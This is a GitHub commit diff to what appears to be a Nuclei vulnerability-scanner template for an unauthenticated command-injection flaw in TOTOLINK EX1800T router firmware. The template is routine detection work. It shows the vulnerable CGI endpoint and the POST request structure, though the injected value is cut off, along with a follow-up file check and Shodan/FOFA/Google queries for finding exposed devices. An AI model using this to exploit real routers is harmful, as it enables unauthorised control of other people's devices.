minor update

main
Dhiyaneshwaran 2024-07-15 11:09:48 +05:30 committed by GitHub
parent fa81b8940a
commit 0a806d3dc4
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 9 additions and 4 deletions

View File

@ -7,12 +7,18 @@ info:
description: |
TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a vulnerability in the apcliEncrypType parameter that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges.
reference:
- https://example.com/reference
- https://github.com/ZackSecurity/VulnerReport/blob/cve/totolink/EX1800T/1.md
- https://immense-mirror-b42.notion.site/TOTOLINK-EX1800T-has-an-unauthorized-arbitrary-command-execution-vulnerability-2f3e308f5e1d45a2b8a64f198cacc350
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://github.com/20142995/nuclei-templates
classification:
epss-score: 0.00043
epss-percentile: 0.0926
metadata:
vendor: totolink
product: a3700r_firmware
shodan-query: http.title:"totolink"
fofa-query: title="totolink"
google-query: intitle:"totolink"
tags: cve,cve2024,rce,unauth
variables:
@ -24,7 +30,7 @@ http:
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Referer: {{RootURL}}/page/index.html?timestamp=1714114057910
Referer: {{RootURL}}/page/index.html
{
"token":"",
@ -35,7 +41,6 @@ http:
GET /{{file}}.txt HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word